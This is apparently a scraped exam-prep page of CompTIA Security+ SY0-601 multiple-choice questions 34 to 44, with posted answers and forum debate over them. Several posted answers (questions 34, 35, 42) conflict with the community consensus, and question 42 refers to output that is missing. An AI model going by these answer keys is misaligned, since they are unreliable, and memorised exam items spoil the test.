  Jossie_C 3 months ago


You're transferring the risk to the insurer. D. TRANSFERENCE.
upvoted 1 times

  banditring 4 months ago


whenever I see insurance I always go with transference
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 63/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #34 Topic 1

A security analyst receives an alert from the company's SIEM that anomalous activity is coming from a local source IP address of 192.168.34.26.
The Chief
Information Security Officer asks the analyst to block the originating source. Several days later, another employee opens an internal ticket stating
that vulnerability scans are no longer being performed properly. The IP address the employee provides is 192.168.34.26. Which of the following
describes this type of alert?

A. True negative

B. True positive

C. False positive

D. False negative

Correct Answer: A

Community vote distribution


C (83%) B (17%)

  redsidemanc2 Highly Voted  4 months, 4 weeks ago


Selected Answer: C
True Positive: A legitimate attack which triggers to produce an alarm. You have a brute force alert, and it triggers. You investigate the alert and
find out that somebody was indeed trying to break into one of your systems via brute force methods.

False Positive: An event signalling to produce an alarm when no attack has taken place. You investigate another of these brute force alerts and
find out that it was just some user who mistyped their password a bunch of times, not a real attack.

False Negative: When no alarm is raised when an attack has taken place. Someone was trying to break into your system, but they did so below
the threshold of your brute force attack logic. For example, you set your rule to look for ten failed login in a minute, and the attacker did only 9.
The attack occurred, but your control was unable to detect it.

True Negative: An event when no attack has taken place and no detection is made. No attack occurred, and your rule didn’t make fire.
upvoted 12 times

  redsidemanc2 4 months, 4 weeks ago


alarms triggered and ciso blocked scanner ip. later scanner is not working cause ciso blocked the scanner
upvoted 1 times

  ronniehaang Most Recent  4 days, 22 hours ago


Selected Answer: C
C. False positive. A false positive is a security alert that is generated when there is no actual threat or security violation, but the security system
identifies it as such. In this scenario, the IP address 192.168.34.26 was blocked based on a security alert from the SIEM, but it turns out that the
IP address was associated with a legitimate source (vulnerability scans). This results in the false positive, where the security system is blocking a
legitimate activity.
upvoted 1 times

  DALLASCOWBOYS 6 days, 10 hours ago


B. This situation is a true positive, as the most recent ticket indicated that the vulnerability scan was no longer working properly, thus the
malicious activity was properly detected, indicating a malicious (anamoly) was detected properly.
upvoted 1 times

  sanlibo 2 weeks, 2 days ago


Selected Answer: C
False Positive = False alert
upvoted 1 times

  asum 3 weeks, 1 day ago


Selected Answer: B
True Positive: A legitimate attack which triggers to produce an alarm. You investigate the alert and find out that somebody was indeed trying to
break into one of your systems via brute force methods. <<Anomaly activity is from an IP address.>>
upvoted 2 times

  KingDrew 3 weeks, 3 days ago


Selected Answer: C
Activity was from employee, not threat, and no attack was performed. Answer is C
upvoted 1 times

  amuk21 4 months, 2 weeks ago


https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 64/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

SIEM alert was triggered with no potential malicious activity. Second part of the question mentions that SEVERAL days later a ticket was out in
for an issue with vulnerability scanning which becomes irrelevant due to time lag between the alert and issue reported. This is certainly a false
positive.
upvoted 3 times

  yorkwu 5 months ago


Selected Answer: C
Agree with C here
upvoted 2 times

  Joe1984 5 months ago


Selected Answer: C
false positive
upvoted 1 times

  varun0 5 months ago


I'm confused about this one. The vulnerability scan is not being performed because that IP is blocked right.
upvoted 2 times

  varun0 5 months ago


CISO thought the alert could be real and went as far as to block it, which makes me think that the alert is true positive.
upvoted 4 times

  Wiggie 5 months ago


Selected Answer: B
The answer is B
upvoted 3 times

  CurlyD 5 months ago


Selected Answer: C
Looks like False Positive.
upvoted 3 times

  pendekarsuling 5 months, 1 week ago


True negative : no rule matched and attack present.
In this case SIEM give alert, so the answer is B ,true positive.
upvoted 3 times

  stoneface 5 months, 1 week ago


Selected Answer: C
A false positive is something that is identified by a scanner or other assessment tool as being a vulnerability, when in fact it is not. For example,
assume that a vulnerability scan identifies an open port on the firewall. Because a certain brand of malware has been known to use this port, the
tool labels this as a security risk, and recommends that you close the port. However, the port is not open on your system. Researching the issue
costs time and effort, and if excessive false positives are thrown by a vulnerability scan, it is easy to disregard the scans entirely, which could
lead to larger problems.
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 65/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #35 Topic 1

A security analyst wants to reference a standard to develop a risk management program. Which of the following is the BEST source for the analyst
to use?

A. SSAE SOC 2

B. ISO 31000

C. NIST CSF

D. GDPR

Correct Answer: C

Community vote distribution


B (89%) 11%

  stoneface Highly Voted  5 months, 1 week ago


Selected Answer: B
ISO 31000 The ISO 31000 Risk Management framework is an international standard that provides businesses with guidelines and principles for
risk management from the International Organization for Standardization. Regulatory compliance initiatives are usually specific to a particular
country and applicable to certain sized businesses or businesses in specific industries. However, ISO 31000 is designed to be used in
organizations of any size. Its concepts work equally well in the public and the private sector, in large or small businesses and nonprofit
organizations.
upvoted 22 times

  carpathia 2 months, 4 weeks ago


Highly Voted 
Depends how you define Security Analyst, if it's cyber then is NIST CSF, if he/she deals with general risk (not pnly cyber) then it's the ISO31000.
God help us with Comptia style questions...
upvoted 6 times

  carpathia 2 months, 4 weeks ago


Coming back to my post, they mention "standard". I don't think NIST CSF is a standard per se, just recommendations. ISO is definitely a
standard.
upvoted 1 times

  DALLASCOWBOYS Most Recent  6 days, 10 hours ago


B. ISO 31000 is a family of standards and guidelines for implementing a risk management-based security policy.
upvoted 1 times

  [Removed] 1 month, 2 weeks ago


Selected Answer: C
Despite the complexity of implementing the NIST CSF, its ability to unify cybersecurity efforts and bridge the gap between technical and business
leaders makes it the gold standard for developing a risk management plan. Going with C…
upvoted 2 times

  jhfdkjshfkjdsho 1 month, 3 weeks ago


Selected Answer: C
NIST CFS "The Framework Core consists of
five concurrent and continuous Functions—Identify, Protect, Detect, Respond, Recover.
When considered together, these Functions provide a high-level, strategic view of the
lifecycle of an organization’s management of cybersecurity risk."
upvoted 2 times

  sauna28 1 month, 3 weeks ago


Selected Answer: B
Risk Management Framework definitely ISO31000
upvoted 1 times

  fzorsqqmdmsvfqvqdv 1 month, 4 weeks ago


Selected Answer: B
It's ISO.
The key is "standard"
CSF is a framework.
upvoted 1 times

  Jimmycyber123 3 months ago


Selected Answer: B
If in doubt use google, but in this case iso 31000 or b is the answer
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 66/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 2 times
  darkgypsy 3 months ago
by CompTIA Guide ..." Most companies will institute enterprise risk management (ERM) policies and procedures, based on frameworks such as
NIST's Risk Management Framework (RMF) or ISO 31K. ..so the B
These legislative and framework compliance requirements are often formalized as a Risk and Control Self-Assessment (RCSA).
upvoted 1 times

  Fitzd 4 months, 3 weeks ago


NIST is considered best for organizations that are in the early stages of developing a risk management plan. ISO 27001, comparatively, is better
for operationally mature organizations.
upvoted 2 times

  Fitzd 4 months, 3 weeks ago


Which of the following is the BEST source for the analyst to use?
upvoted 1 times

  carpathia 4 months, 3 weeks ago


Selected Answer: B
ISO 31000 addresses all forms of risk and management, not just cybersecurity risks. Exactly what the question asks. The question doesn't
mention cyber security in particular.
upvoted 2 times

  NICKJONRIPPER 2 months, 2 weeks ago


A security analyst wants to...
upvoted 1 times

  Halaa 4 months, 4 weeks ago


Selected Answer: B
ISO 31000 Risk management
upvoted 2 times

  varun0 5 months ago


Selected Answer: B
B ISO 31000
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 67/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #36 Topic 1

The Chief Information Security Officer (CISO) requested a report on potential areas of improvement following a security incident. Which of the
following incident response processes is the CISO requesting?

A. Lessons learned

B. Preparation

C. Detection

D. Containment

E. Root cause analysis

Correct Answer: A

Community vote distribution


A (100%)

  rodwave Highly Voted  2 months, 3 weeks ago


Selected Answer: A
Answer: Lessons learned

Lessons learned is the final step in the incident response where the organization reviews their incident response and prepare for a future attack.
This is where you understand how/why an incident occurred, identify any weaknesses in your organization's practices, any positive elements or
practices that went well, and things that could be done to prepare for a future incident.
=========================
Incident Response - A set of instructions or procedures an IT staff follows to detect, respond to, recover and recover from a security incident.

Phases in the Incident Response Plan


1. Preparation: The organization plans out how they will respond to attack, this can involve:
2. Identification: Detecting and determining whether an incident has occurred.
3. Containment: Once a threat has been identified, the organization must limit or prevent any further damage.
4. Eradication: The removal of the threat
5. Recovery: Restoring systems affected by the incident
6. Lessons Learned: Where the organization reviews their incident response and prepare for a future attack
upvoted 7 times

  DALLASCOWBOYS 6 days, 10 hours ago


Most Recent 
A. Lessons Learned. Evaluates the response plan and procedures and improve them as necessary
upvoted 1 times

  mlonz 2 weeks, 5 days ago


something straightforward
upvoted 1 times

  mlonz 2 weeks, 5 days ago


something straighforward
upvoted 1 times

  Korokokokokoko 2 months, 2 weeks ago


Selected Answer: A
This is the correct answer
upvoted 1 times

  comeragh 5 months ago


Selected Answer: A
A - Lessons Learned agree with
upvoted 3 times

  varun0 5 months ago


Selected Answer: A
Lessons learned is a process in incident response to learn from the incident and improve.
upvoted 3 times

  stoneface 5 months, 1 week ago


Selected Answer: A
What are lessons learned ? The Project Management Institute (PMI) defined as “the learning gained from the process of performing the project”.
In the context of security incidents, they usually take place after a security incident has occurred and has been mitigated.

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 68/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 69/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #37 Topic 1

A company is providing security awareness training regarding the importance of not forwarding social media messages from unverified sources.
Which of the following risks would this training help to prevent?

A. Hoaxes

B. SPIMs

C. Identity fraud

D. Credential harvesting

Correct Answer: A

Community vote distribution


A (83%) Other

  babyzilla Highly Voted  3 months ago


I read the comments below. Many of you are associating social media messages with fake news which is leading you to the answer: Hoax.
However, social media messages are usually just that, messages. Think of a DM via Instagram. That is a direct message through a social media
application. Most social medias have IM features. I think there is a false notion of fake news with this question. For this reason, I believe it is
SPIM.
upvoted 9 times

  Joe1984 Highly Voted  5 months ago


Selected Answer: A
Hoaxes
upvoted 8 times

  DALLASCOWBOYS Most Recent  6 days, 10 hours ago


A. Hoax. Is designed to convince targets to perform an action that would reduce or harm their IT security. often encourages victims to spread the
word. Since they are concerned with forwarding unverified sources, suggests it is a hoax they are concerned with.
upvoted 1 times

  shi_ 1 week ago


Selected Answer: B
this question really have vague answers options.... i was contemplating between hoaxes and SPIM however imo in term of loss, hoaxes don't
cost much for a company(example, resulting in a sense of urgency to forward threatening/frightening massages that affect company) however
SPIM can be quite fatal for a company error (for example, clicking a link resulting in malware/spyware)
upvoted 1 times

  JustIyke 3 weeks, 2 days ago


Context is important in this question. Per COMPTIA definitions, the answer is SPIM because the message comes from Social Media. Hoax or any
other option will be correct in conventional terms, but for the purpose of this test I am 100% sure the answer is SPIM
upvoted 3 times

  blacktaliban 3 months ago


Selected Answer: A
Sharing unverifiable information on social media might as well say its fake news
upvoted 1 times

  BigLao 3 months, 1 week ago


I would go with spim.
The question talks about social media and when you look at the definition of spim it ties with it perfectly.
upvoted 3 times

  Jossie_C 3 months ago


This is incorrect. Spam is Spam over instant messaging. Social media is not necessarily instant messaging
upvoted 1 times

  rindrasakti 3 months, 3 weeks ago


Selected Answer: A
Off curse the answer is A Hoaxes
upvoted 1 times

  Iamboolean 4 months, 3 weeks ago


Selected Answer: A
Answer A = Hoaxes = Fake News.
upvoted 1 times
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 70/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  Wiggie 5 months ago


Selected Answer: A
Answer is A
upvoted 2 times

  comeragh 5 months ago


Selected Answer: C
I agree with C being the best choice answer here
upvoted 1 times

  varun0 5 months ago


Selected Answer: A
Hoaxes is fake news, company is asking employees to not share messages which are not from a reputed source or a trust worthy news
organization for example, not your mom's facebook group about anti vax.
upvoted 2 times

  stoneface 5 months ago


Selected Answer: C
I think the best answer to this is Identity fraud.

SPIM is spam over instant messaging.


Hoaxes are another common social engineering technique, often combined with phishing attacks. An email alert or web pop-up will claim to have
identified some sort of security problem, such as virus infection, and offer a tool to fix the problem.

Credential harvesting -- not aplicable


upvoted 1 times

  varun0 5 months ago


How would you gain someone's documents from social media which will then be used to impersonate that person? Its not like people post
their social security number on Facebook.

Hoaxes = fake news.


upvoted 9 times

  stoneface 5 months ago


I stand corrected, A is correct-> Professor messer video explaining hoaxes https://www.youtube.com/watch?v=9fXbXQ-pnsY
upvoted 11 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 71/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #38 Topic 1

A security analyst is receiving numerous alerts reporting that the response time of an internet-facing application has been degraded. However, the
internal network performance was not degraded. Which of the following MOST likely explains this behavior?

A. DNS poisoning

B. MAC flooding

C. DDoS attack

D. ARP poisoning

Correct Answer: C

Community vote distribution


C (100%)

  stoneface Highly Voted  5 months, 1 week ago


Selected Answer: C
Most denial of service (DoS) attacks against websites and gateways are distributed DoS (DDoS). This means that the attack is launched from
multiple hosts simultaneously. Typically, a threat actor will compromise machines to use as handlers in a command and control network. The
handlers are used to compromise hundreds or thousands or millions of hosts with DoS tools (bots) forming a botnet.

The internal network has not been affected by the attack.


upvoted 19 times

  varun0 5 months ago


Agreed
upvoted 2 times

  ronniehaang Most Recent  4 days, 21 hours ago


Selected Answer: C
C. DDoS attack.

A Distributed Denial of Service (DDoS) attack is a type of cyber attack in which multiple compromised computers are used to flood a targeted
system with high volumes of traffic, overloading it and making it unavailable for its intended users. If the targeted system is an internet-facing
application, it could result in degraded response times or even complete unavailability. In such cases, the internal network performance may not
be degraded, but the internet-facing application would be impacted by the increased traffic from the DDoS attack.
upvoted 1 times

  DALLASCOWBOYS 6 days, 10 hours ago


B. MAC Flooding. In MAC Flooding the attacker is not getting into the path between the client and server. Question states internal network was
not degraded. DDos denies service, The question stated performance was degraded, not denied.
upvoted 1 times

  duagreg 2 months ago


DDoS for sure
upvoted 1 times

  Iamboolean 4 months, 3 weeks ago


Selected Answer: C
Answer C = Distributed Denial Of Service.
upvoted 1 times

  comeragh 5 months ago


Good spot stoneface
upvoted 1 times

  varun0 5 months ago


Selected Answer: C
DDOS seems obvious to me.
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 72/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #39 Topic 1

Which of the following will increase cryptographic security?

A. High data entropy

B. Algorithms that require less computing power

C. Longer key longevity

D. Hashing

Correct Answer: A

Community vote distribution


A (100%)

  stoneface Highly Voted  5 months ago


Selected Answer: A
Entropy is a measure of disorder. A plaintext will usually exhibit low entropy as it represents a message in a human language or programming
language or data structure. The plaintext must be ordered for it to be intelligible to a person, computer processor, or database. One of the
requirements of a strong cryptographic algorithm is to produce a disordered ciphertext. Put another way, the ciphertext must exhibit a high level
of entropy. If any elements of order from the plaintext persist, it will make the ciphertext vulnerable to cryptanalysis, and the algorithm can be
shown to be weak.
upvoted 38 times

  Iamboolean 4 months, 3 weeks ago


Very good explanation, thanks!
upvoted 1 times

  varun0 Highly Voted  5 months ago


Selected Answer: A
Entropy seems obvious to me.
upvoted 5 times

  ronniehaang Most Recent  4 days, 21 hours ago


Selected Answer: A
A. High data entropy

High data entropy refers to the unpredictability and randomness of data used as input to a cryptographic system. The higher the entropy, the
more difficult it is for an attacker to guess the input data, thereby increasing the cryptographic security of the system.

For example, in a password-based encryption system, high entropy in the password input would result in a more secure encryption key, making it
more difficult for an attacker to crack the encryption and access the protected data.
upvoted 1 times

  DALLASCOWBOYS 6 days, 10 hours ago


A. high data entropy. The higher the randomness, the greater the security.
upvoted 1 times

  CL_QRT 3 weeks, 4 days ago


A is the answer
upvoted 1 times

  03allen 4 months ago


Anyone can tell me why C and D are not right? It doesn't say the best one, right?
upvoted 1 times

  lordguck 3 months ago


C decreases security, as it gives attackes more time to break/use (e.g. if stolen and no one noticed) the keys.
D is not applicable, as the question already talks about crytographic security and this includes for all relevant methods in use, ways to detect
tampering.
upvoted 1 times

  lordguck 3 months ago


Sorry, I was wrong here due to a misunderstanding of the used term "key longevity". "longevity" refers to the trust one has in the qualities
(e.g. time to break) of an encryption method (Topic 5C handbook) and NOT to the lifetime of an certificate ("key" got me there).
Nevertheless I vote for A, as C "longevity" is not measurable in contrast to A.
upvoted 1 times

  alayeluwa 3 months, 3 weeks ago

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 73/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

The keyword in the question is “Increase”. Increase = best one.


upvoted 1 times

  Ay_ma 4 months, 2 weeks ago


Selected Answer: A
High data entropy: In cryptography, entropy is used to produce random numbers, which in turn are used to produce security keys to protect data
while it's in storage or in transit. The greater the quality of random number generation (RNG), the greater the quality of random keys produced,
and thus the higher the security value of the key
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 74/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #40 Topic 1

Which of the following statements BEST describes zero-day exploits?

A. When a zero-day exploit is discovered, the system cannot be protected by any means.

B. Zero-day exploits have their own scoring category in CVSS.

C. A zero-day exploit is initially undetectable, and no patch for it exists.

D. Discovering zero-day exploits is always performed via bug bounty programs.

Correct Answer: C

Community vote distribution


C (100%)

  varun0 Highly Voted  5 months ago


Selected Answer: C
I'll go with C.

A says it can be protected by ANY means which is not true, sure the exploit itself doesn't have a patch yet but we can isolate the effected system
or have some kind of compensating control in place.
upvoted 10 times

  ronniehaang Most Recent  4 days, 21 hours ago


Selected Answer: C
C. A zero-day exploit is initially undetectable, and no patch for it exists.

A zero-day exploit refers to a type of cyber attack that utilizes a previously unknown vulnerability in software or hardware that hasn't been
identified or fixed by the manufacturer. As a result, there is no existing protection or patch to defend against it, making it a significant risk to
organizations and individuals. When a zero-day exploit is discovered, the first priority is to alert the vendor and hope that they can develop a
patch as quickly as possible.
upvoted 1 times

  DALLASCOWBOYS 6 days, 10 hours ago


C. zero day attacks are attacks that exploit a vulnerablity that is unknown, therefore, no patch is available.
upvoted 1 times

  KingDrew 3 weeks, 3 days ago


Selected Answer: C
Zero-day = Never seen before attack
Therefore it cannot be patched or recognized in a database if it has not occurred or been documented before.
upvoted 1 times

  Iamboolean 4 months, 3 weeks ago


Selected Answer: C
Answer C = A zero-day exploit is initially undetectable, and no patch for it exists.

The other closest answer could be -->


"A = When a zero-day exploit is discovered, the system cannot be protected by any means."

However, this statement is not precise as it implies the system cannot be protected by any means, which is not true.

Other answers are not as precise. Therefore, answer corresponds to letter C in my opinion...
upvoted 1 times

  comeragh 5 months ago


Selected Answer: C
Agree with C being the best choice answer here
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 75/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #41 Topic 1

A company wants to restrict emailing of PHI documents. The company is implementing a DLP solution. In order to restrict PHI documents, which
of the following should be performed FIRST?

A. Retention

B. Governance

C. Classification

D. Change management

Correct Answer: C

Community vote distribution


C (100%)

  varun0 Highly Voted  5 months ago


Selected Answer: C
Data has to be first classified for the DLP to know which data can leave the network and which can't.
upvoted 12 times

  DALLASCOWBOYS Most Recent  6 days, 9 hours ago


C. Classification. Data classification is the primary means by which data is protected based on its need for secrecy, sensitivity and confidentiality.
upvoted 1 times

  IYKMba 3 months ago


Selected Answer: C
Classification is the first step to determine what data contains PHI
upvoted 2 times

  xxxdolorxxx 2 weeks ago


This is sort of what I'm thinking. Before knowing how to stop PHI from leaving...need to know exactly what data has PHI.
upvoted 1 times

  hackerguy 3 months, 1 week ago


Selected Answer: C
Data Classification:
Category based on the value to the organization and the sensitivity of the
information if it were to be disclosed
upvoted 1 times

  [Removed] 5 months ago


Classification, sure... But I also think Change management, because changing any sort of business process typically starts with that.
upvoted 2 times

  Gravoc 4 months, 2 weeks ago


Change management doesn't make sense in this context, because its asking what needs to be implemented first to assist the DPL in
preventing PHI from being emailed. Classification is the first thing the DLP needs to properly do it's job. Change management would be like
going through the approval process to add DLP as a tool to your security framework. In this case, the question already informed us that the
DLP is in place. Meaning we can assume that the change management approval process has already been completed in regards to the DLP,
and any implications imposed by the DLP. You wouldn't approve the use of the DLP without also approving the classification of sensitive and
proprietary information.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 76/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #42 Topic 1

A security analyst is investigating some users who are being redirected to a fake website that resembles www.comptia.org. The following output
was found on the naming server of the organization:

Which of the following attacks has taken place?

A. Domain reputation

B. Domain hijacking

C. Disassociation

D. DNS poisoning

Correct Answer: B

Community vote distribution


D (100%)

  stoneface Highly Voted  5 months, 1 week ago


Selected Answer: D
DNS server cache poisoning aims to corrupt the records held by the DNS server itself. This can be accomplished by performing DoS against the
server that holds the authorized records for the domain, and then spoofing replies to requests from other name servers. Another attack involves
getting the victim name server to respond to a recursive query from the attacking host. A recursive query compels the DNS server to query the
authoritative server for the answer on behalf of the client.
upvoted 19 times

  JD2354 Most Recent  1 day, 19 hours ago


I agree with the crowd, answer d. why are so many "correct answers" actually incorrect on this?
upvoted 1 times

  nul8212 1 month, 2 weeks ago


Selected Answer: D
The answer is D.

Domain hijacking is where someone tries to register your domain, access your
hosted control panel, and set up a website that is similar to yours. This asnwer is wrong.
upvoted 1 times

  Idkanything 2 months, 2 weeks ago


Selected Answer: D
D. DNS poisoning

Domain name to IP address entries in a DNS server are altered


upvoted 3 times

  alayeluwa 3 months, 3 weeks ago


Selected Answer: D
Question gave you the answer “Redirected to a fake website that resembles www.comptia.org“

DNS Poisoning it is.


upvoted 4 times

  Bimtos 3 months, 3 weeks ago


Domain hijacking or domain theft is the act of changing the registration of a domain name without the permission of its original registrant, or by
abuse of privileges on domain hosting and registrar software systems.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 77/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  Fitzd 4 months, 3 weeks ago


what they are asking, and the example is off. Domain Hijacking or Domain Spoofing is an attack where an organization's web address is stolen by
another party. The other party changes the enrollment of another's domain name without the consent of its legitimate owner.
upvoted 1 times

  Joe1984 5 months ago


DNS poisoning is the right answer
upvoted 1 times

  varun0 5 months ago


Selected Answer: D
We can see that the www IP and other name IP is different, DNS cache has been modified to redirect the users.
upvoted 3 times

  lordguck 3 months ago


D is right, but the DNS output does not show that, necessarily. Only the question gives you the answer in this case.
upvoted 1 times

  Vishnuks 5 months ago


Answer D (DNS poisoning)
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 78/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #43 Topic 1

Which of the following describes the continuous delivery software development methodology?

A. Waterfall

B. Spiral

C. V-shaped

D. Agile

Correct Answer: D

Community vote distribution


D (100%)

  rodwave Highly Voted  2 months, 3 weeks ago


Selected Answer: D
Answer: Agile

Agile methodology is a way to manage a project by breaking it up into several phases. It involves constant collaboration with stakeholders and
continuous improvement at every stage. Once the work begins, teams cycle through a process of planning, executing, and evaluating.
=======================================
Helpful Info:

Waterfall - A sequential development process that flows like a waterfall through all phases of a project (analysis, design, development, and
testing, for example), with each phase completely wrapping up before the next phase begins.
upvoted 9 times

  mlonz 2 weeks, 5 days ago


Nice information Rodwave, you should try to add information for every questions
thanks mate
upvoted 1 times

  varun0 Highly Voted  5 months ago


Selected Answer: D
Agile seems right. Its a fast paced life cycle which iterates features according to the user's feedback.
upvoted 9 times

  scarceanimal Most Recent  1 day, 4 hours ago


i never heard of this once, not sure if it was on exam objectives...
upvoted 1 times

  ronniehaang 4 days, 21 hours ago


Selected Answer: D
D. Agile.

Continuous delivery is a software development methodology that is based on the principles of agile development. It emphasizes a rapid, iterative,
and frequent release cycle, where new features and bug fixes are delivered to customers on a regular basis. The goal of continuous delivery is to
ensure that code changes can be rapidly and reliably deployed to production, minimizing downtime and maximizing the value delivered to
customers. This approach relies on automation, collaboration, and communication to ensure that software is delivered quickly, with high quality,
and with minimal risk.
upvoted 1 times

  DALLASCOWBOYS 6 days, 9 hours ago


D. Agile, in this methodology, updates are made continually, piece-by-piece, enabling software code to be delivered to customers as soon as it is
completed and tested.
upvoted 1 times

  [Removed] 3 months, 3 weeks ago


Selected Answer: D
Agile approach to software
development is to ensure customer satisfaction via early and
continuous delivery of software.
upvoted 2 times

  sucram 4 months, 1 week ago


syo 501
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 79/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  RonWonkers 4 months, 3 weeks ago


Selected Answer: D
Answer is D
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 80/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #44 Topic 1

Which of the following is the BEST example of a cost-effective physical control to enforce a USB removable media restriction policy?

A. Putting security/antitamper tape over USB ports, logging the port numbers, and regularly inspecting the ports

B. Implementing a GPO that will restrict access to authorized USB removable media and regularly verifying that it is enforced

C. Placing systems into locked, key-controlled containers with no access to the USB ports

D. Installing an endpoint agent to detect connectivity of USB and removable media

Correct Answer: B

Community vote distribution


B (48%) A (40%) 12%

  rodwave Highly Voted  2 months, 3 weeks ago


Selected Answer: A
Answer: Putting security/antitamper tape over USB ports, logging the port numbers, and regularly inspecting the ports
=============================================
Explanation:

The question is asking for two specific requirements for the solution:
1. A solution that's cost-effective
2. A solution that's a physical control

The option to implement a GPO (B) and installing an endpoint agent (D) are software-based implementations, while in the case of the GPO being
cost-effective, they do not address the physical control requirement for the solution.

Option C would address the requirement as a physical control by preventing users from physically access the USB port and likely the best out all
of the given options, however, this option is not cheapest so it's not addressing the cost-effectiveness required for the solution.

Only option A would address each requirement of the solution being a cost-effective physical control that can be implemented.
upvoted 16 times

  Nirmalabhi 2 months ago


absolutely agree with you. BTW your input on the discussion of the questions is phenomenal so thank you
upvoted 4 times

  Hewn Highly Voted  4 months, 4 weeks ago


Selected Answer: B
It's pretty obviously B, I think ya'll are getting too hung up on a physical control being 100% physical. A biometric scanner isn't useful without
some kind of software running that compares my signature to a known copy of whatever it's scanning, yet it is still considered a physical control.
upvoted 14 times

  hanmai Most Recent  2 days, 18 hours ago


From what I remember hearing in class, GPOs are considered to be both logical and physical.
upvoted 1 times

  ronniehaang 4 days, 20 hours ago


Selected Answer: A
A. Putting security/antitamper tape over USB ports, logging the port numbers, and regularly inspecting the ports.

This is a cost-effective physical control to enforce a USB removable media restriction policy, as it physically blocks unauthorized access to the
USB ports, making it difficult for employees to insert unauthorized storage devices into the systems. The logging of port numbers and regular
inspection can help keep track of the tapes and detect any tampering or unauthorized access. This method is simple, low cost, and can be easily
implemented in most environments.
upvoted 1 times

  zf1343 1 week ago


Those who vote for GPO should pay attention to: "restrict access to 'authorized' USB removable media".
GPO can disable removable media but not sure how it can recognize an 'authorized' USB from unauthorized one. A DLP solution can selectively
allow what can or cannot be copied to/from a USB drive.
upvoted 1 times

  Red_Rum 1 week, 1 day ago


Selected Answer: A
physical and cheap, only option is A
upvoted 1 times

  pa3cks 1 week, 3 days ago


https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 81/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

D. Installing an endpoint agent to detect connectivity of USB and removable media


An endpoint agent is a software that is installed on each endpoint device, such as laptops, desktops, and servers, that is used to monitor and
control access to the device. By installing an endpoint agent, an organization can detect when a USB removable media is connected to a device
and then block or allow access to the device based on an organization's USB removable media restriction policy. This is a cost-effective method
as it allows for centralized management and monitoring of the USB removable media restriction policy, it can be done remotely and it allows for
real-time notifications of any unauthorized access attempts.
upvoted 1 times

  sanlibo 2 weeks, 2 days ago


Selected Answer: B
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-gpod/260b58dc-da14-400b-8b82-6abbfd529fbf
upvoted 1 times

  rumblerally 3 weeks ago


If yall wanna get crazy with the "physical control" part... technically "regularly verifying that it is enforced" is a physical control.
upvoted 1 times

  LaoX 1 month ago


Selected Answer: B
I believe GPO is the most cost-effective method. You have to pay to buy Endpoint or antitamper tape.
upvoted 1 times

  nul8212 1 month, 2 weeks ago


Selected Answer: B
The answer is B. User antitamper tape is not a real solution, it could be cheaper, but it is not a real solution. If your boss asks what do you
recommend and you say to use antitamper tape, he will hire the janitor instead of you.
upvoted 4 times

  [Removed] 1 month, 2 weeks ago


Lol Funny
upvoted 2 times

  okay123 1 month, 3 weeks ago


Selected Answer: A
It has to be A, cause B is a technical control.
upvoted 2 times

  PeP1T0 1 month, 4 weeks ago


Selected Answer: A
In my opinion it's A, because B is logical control and C although being another physical control is not cost-effective.
upvoted 2 times

  Sanjucbsa 2 months ago


Selected Answer: A
For physical control it has to be option A, otherwise option B.
upvoted 2 times

  tek7ila 2 months, 1 week ago


Selected Answer: A
Yep the only answer that meets both criterias (cheap & physical) is A!
upvoted 1 times

  tek7ila 2 months, 1 week ago


Selected Answer: B
B <--- it has to be cheap :p Implementing GPO is free.
upvoted 3 times

  tek7ila 2 months ago


Sory, i made some reading and it has to be A. B is technical control the same as D.
Physical are A and C but A is cheaper :) So its 100% A.
upvoted 2 times

